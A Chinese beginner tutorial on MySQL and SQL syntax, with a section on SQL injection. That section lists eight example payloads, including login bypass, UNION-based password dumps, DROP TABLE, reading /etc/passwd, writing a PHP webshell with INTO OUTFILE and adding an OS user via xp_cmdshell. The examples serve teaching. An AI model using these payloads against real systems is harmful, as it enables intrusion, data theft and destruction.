网站建设系统课程怎么清空WordPress

网站建设系统课程,怎么清空WordPress,做服装团购有哪些网站,做网站用什么语言和工具1.初步了解数据库#xff08;MySQL#xff09; 一、 什么是数据库 数据库(DataBase,简称DB) 1.概念 : 长期存放在计算机内,有组织,可共享的大量数据的集合,是一个数据仓库 2.作用 : 保存,并能安全管理数据(如:增删改查等),减少冗余… 数据库总览 : 4.关系型数…1.初步了解数据库MySQL一、 什么是数据库数据库(DataBase,简称DB)1.概念 : 长期存放在计算机内,有组织,可共享的大量数据的集合,是一个数据仓库2.作用 : 保存,并能安全管理数据(如:增删改查等),减少冗余…数据库总览 :4.关系型数据库 (SQL)MySQL , Oracle , SQL Server , SQLite , DB2 , …关系型数据库通过外键关联来建立表与表之间的关系非关系型数据库*(NOSQL)*Redis , MongoDB , …非关系型数据库通常指数据以对象的形式存储在数据库中而对象之间的关系通过每个对象自身的属性来决定二、什么是DBMS数据库管理系统( DataBase Management System )数据库管理软件 , 科学组织和存储数据 , 高效地获取和维护数据mysql是现在流行的开源的,免费的 关系型数据库由瑞典MySQL AB 公司开发目前属于 Oracle 旗下产品。特点1.免费 , 开源数据库2.小巧 , 功能齐全3.使用便捷4.可运行于Windows或Linux操作系统5.可适用于中小型甚至大型网站应用6.官网 : https://www.mysql.com/2.初步了解sql注入漏洞一、什么是SQl注入漏洞1.概念SQL注入SQL Injection是一种常见的Web安全漏洞攻击者通过在应用程序的输入字段中插入恶意的SQL代码从而操控后端数据库查询获取、修改或删除数据库中的敏感数据。2.基本原理SQL注入漏洞产生的原因是应用程序将用户输入直接拼接到SQL查询语句中而没有进行适当的过滤或参数化处理。当恶意输入被当作SQL代码执行时就可能导致非预期的数据库操作。3.注入过程二、SQl注入功能1. 数据泄露绕过登录验证具体操作-- 输入用户名: admin ---- 输入密码: 任意值-- 实际执行的SQLSELECT * FROM users WHERE usernameadmin -- AND passwordxxx效果注释掉密码检查直接以 admin 身份登录。2. 数据泄露获取数据库内容具体操作-- 正常查询SELECT title, content FROM articles WHERE id1-- 注入攻击1 UNION SELECT username, password FROM users --效果返回 users 表中的账号密码数据。3. 数据篡改修改数据库记录具体操作-- 正常更新UPDATE profile SET bioHello WHERE user_id100-- 注入攻击100; UPDATE users SET passwordhacked WHERE usernameadmin --效果修改 admin 的密码为 hacked。4. 数据删除清空数据库表具体操作-- 正常删除DELETE FROM orders WHERE order_id123-- 注入攻击123; DROP TABLE users --效果删除整个 users 表导致数据丢失。5. 权限提升创建管理员账户具体操作-- 正常插入INSERT INTO customers (name, email) VALUES (test, testexample.com)-- 注入攻击test, testexample.com); INSERT INTO admins (username, password) VALUES (hacker, pssw0rd) --效果在 admins 表中插入一个管理员账户。6. 服务器文件读取获取敏感文件具体操作MySQL-- 注入攻击1 UNION SELECT LOAD_FILE(/etc/passwd), NULL --效果返回服务器的 /etc/passwd 文件内容Linux用户信息。7. 服务器文件写入上传Webshell具体操作MySQL-- 注入攻击1 UNION SELECT ?php system($_GET[cmd]); ?, NULL INTO OUTFILE /var/www/html/shell.php --效果在网站根目录写入 shell.php攻击者可执行任意命令。8. 操作系统命令执行控制服务器具体操作SQL Server-- 注入攻击1; EXEC xp_cmdshell net user hacker Pssw0rd /add --效果在服务器上创建新用户 hacker用于远程登录。3.练习sql语句1、DDL:操作数据库1.1 查询所有的数据库 show databases; 1.2 创建数据库 create database 数据库名称; 创建数据库(判断如果不存在则创建) create database if not exists 数据库名称; 1.3 删除数据库 drop database 数据库名称; 创建数据库(判断如果不存在则创建) create database if not exists 数据库名称; 1.4 使用数据库 数据库创建好了要在数据库中创建表得先明确在哪儿个数据库中操作此时就需要使用数据库。 use 数据库名称; select database(); ------》查看当前使用的数据库2、DDL:操作表操作表也就是对表进行增Create删Retrieve改Update查Delete。2.1 查询表 查询当前数据库下所有表名称 -------》 show tables; 查询表结构 ------------- --------》 desc 表名称; 2.2 创建表 create table 表名 ( 字段名1 数据类型1, 字段名2 数据类型2, 字段名n 数据类型n ); 例如 create table tb_user ( id int, username varchar(20), password varchar(32) ); 2.3 表的数据类型 数值------------------------------- tinyint : 小整数型占一个字节 int 大整数类型占四个字节 eg age int double 浮点类型 使用格式 字段名 double(总长度,小数点后保留的位数) eg score double(5,2) 日期---------------------------------------------- date 日期值。只包含年月日 eg birthday date datetime 混合日期和时间值。包含年月日时分秒 字符串--------------------------------------------- char 定长字符串。 优点存储性能高 缺点浪费空间 eg name char(10) 如果存储的数据字符个数不足10个也会占10个的空间 varchar 变长字符串。 优点节约空间 缺点存储性能底 eg:name varchar(10) 如果存储的数据字符个数不足10个那就数据字符个数是几就占几个的空间创建表案例需求设计一张学生表请注重数据类型、长度的合理性 1. 编号 2. 姓名姓名最长不超过10个汉字 3. 性别因为取值只有两种可能因此最多一个汉字 4. 生日取值为年月日 5. 入学成绩小数点后保留两位 6. 邮件地址最大长度不超过 64 7. 家庭联系电话不一定是手机号码可能会出现 - 等字符 8. 学生状态用数字表示正常、休学、毕业... create table student ( id int, name varchar(10), gender char(1), birthday date, score double(5,2), email varchar(15), tel varchar(15), status tinyint );3.删除表删除表 drop table 表名; 删除表时判断表是否存在 drop table if exists 表名;4.修改表修改表名 alter table 表名 rename to 新的表名; -- 将表名student修改为stu alter table student rename to stu; 添加一列 alter table 表名 add 列名 数据类型; -- 给stu表添加一列address该字段类型是varchar(50) alter table stu add address varchar(50); 修改数据类型 alter table 表名 modify 列名 新数据类型; -- 将stu表中的address字段的类型改为 char(50) alter table stu modify address char(50); 修改列名和数据类型 alter table 表名 change 列名 新列名 新数据类型; -- 将stu表中的address字段名改为 addr类型改为varchar(50) alter table stu change address addr varchar(50); 删除列 alter table 表名 drop 列名; -- 将stu表中的addr字段 删除 alter table stu drop addr;5、DML操作表中的数据DML主要是对数据进行增insert删delete改update操作。给指定列添加数据 insert into 表名(列名1,列名2,…) values(值1,值2,…); 给全部列添加数据 insert into 表名 values(值1,值2,…); 批量添加数据 insert into 表名(列名1,列名2,…) values(值1,值2,…),(值1,值2,…),(值1,值2,…)…; insert into 表名 values(值1,值2,…),(值1,值2,…),(值1,值2,…)…;练习增select * from stu; 1 -- 给指定列添加数据 insert into stu (id, name) values (1, 张三); -- 给所有列添加数据列名的列表可以省略的 insert into stu (id,name,sex,birthday,score,email,tel,status) values (2,李四,男,1999-11-11,88.88,lisiitcast.cn,13888888888,1); insert into stu values (2,李四,男,1999-11-11,88.88,lisiitcast.cn,13888888888,1); -- 批量添加数据 insert into stu values (2,李四,男,1999-11-11,88.88,lisiitcast.cn,13888888888,1), (2,李四,男,1999-11-11,88.88,lisiitcast.cn,13888888888,1), (2,李四,男,1999-11-11,88.88,lisiitcast.cn,13888888888,1);修改表数据update 表名 set 列名1值1,列名2值2,… [where 条件] ; 1 注意 修改语句中如果不加条件则将所有数据都修改 像上面的语句中的中括号表示在写sql语句中可以省略这部分 练习 将张三的性别改为女 update stu set sex 女 where name 张三; 将张三的生日改为 1999-12-12 分数改为99.99 update stu set birthday 1999-12-12, score 99.99 where name 张三; 注意如果update语句没有加where条件则会将表中所有数据全部修改 update stu set sex 女;删除数据delete from 表名 [where 条件] ; 练习 -- 删除张三记录 delete from stu where name 张三; -- 删除stu表中所有的数据 delete from stu;6、DQL数据的查询select 字段列表 from 表名列表 where 条件列表 group by 分组字段 having 分组后条件 order by 排序字段 limit 分页限定基础查询查询多个字段 select 字段列表 from 表名; select * from 表名; -- 查询所有数据 去除重复记录 select distinct 字段列表 from 表名; 起别名 as: as 也可以省略 查询姓名、数学成绩、英语成绩。并通过as给math和english起别名as关键字可以省略 select name,math as 数学成绩,english as 英文成绩 from stu; select name,math 数学成绩,english 英文成绩 from stu;条件查询select 字段列表 from 表名 where 条件列表;条件查询练习查询年龄大于20岁的学员信息 select * from stu where age 20; 查询年龄大于等于20岁的学员信息 select * from stu where age 20; 查询年龄大于等于20岁 并且 年龄 小于等于 30岁 的学员信息 select * from stu where age 20 age 30; select * from stu where age 20 and age 30; 上面语句中 和 and 都表示并且的意思。建议使用 and 。 也可以使用 between … and 来实现上面需求 select * from stu where age BETWEEN 20 and 30; 查询入学日期在’1998-09-01’ 到 ‘1999-09-01’ 之间的学员信息 select * from stu where hire_date BETWEEN 1998-09-01 and 1999-09-01; 查询年龄等于18岁的学员信息 select * from stu where age 18; 查询年龄不等于18岁的学员信息 select * from stu where age ! 18; select * from stu where age 18; 查询年龄等于18岁 或者 年龄等于20岁 或者 年龄等于22岁的学员信息 select * from stu where age 18 or age 20 or age 22; select * from stu where age in (18,20 ,22); 查询英语成绩为 null的学员信息 null值的比较不能使用 或者 ! 。需要使用 is 或者 is not select * from stu where english null; -- 这个语句是不行的 select * from stu where english is null; select * from stu where english is not null;模糊查询练习模糊查询使用like关键字可以使用通配符进行占位:1_ : 代表单个任意字符2% : 代表任意个数字符查询姓’马’的学员信息 select * from stu where name like 马%; 查询第二个字是’花’的学员信息 select * from stu where name like _花%; 查询名字中包含 ‘德’ 的学员信息 select * from stu where name like %德%;排序查询select 字段列表 from 表名 order by 排序字段名1 [排序方式1],排序字段名2 [排序方式2] …; ASC 升序排列 默认值 DESC 降序排列 注意如果有多个排序条件当前边的条件值一样时才会根据第二条件进行排序 查询学生信息按照年龄升序排列 select * from stu order by age ; 查询学生信息按照数学成绩降序排列 select * from stu order by math desc ; 查询学生信息按照数学成绩降序排列如果数学成绩一样再按照英语成绩升序排列 select * from stu order by math desc , english asc ;7、 聚合函数将一列数据作为一个整体进行纵向计算。现有一需求让我们求表中所有数据的数学成绩的总和。这就是对math字段进行纵向求和。聚合函数分类函数名 功能count(列名) 统计数量一般选用不为null的列max(列名) 最大值min(列名) 最小值sum(列名) 求和avg(列名) 平均值聚合函数语法select 聚合函数名(列名) from 表; 注意null 值不参与所有聚合函数运算 统计班级一共有多少个学生 select count(*) from stu; 查询数学成绩的最高分 select max(math) from stu; 查询数学成绩的最低分 select min(math) from stu; 查询数学成绩的总分 select sum(math) from stu; 查询数学成绩的平均分 select avg(math) from stu; 查询英语成绩的最低分 select min(english) from stu;8、分页查询从0开始查询查询3条数据 select * from stu limit 0 , 3; 每页显示3条数据查询第1页数据 select * from stu limit 0 , 3; 每页显示3条数据查询第2页数据 select * from stu limit 3 , 3; 每页显示3条数据查询第3页数据 select * from stu limit 6 , 3; 从上面的练习推导出起始索引计算公式 起始索引 (当前页码 - 1) * 每页显示的条数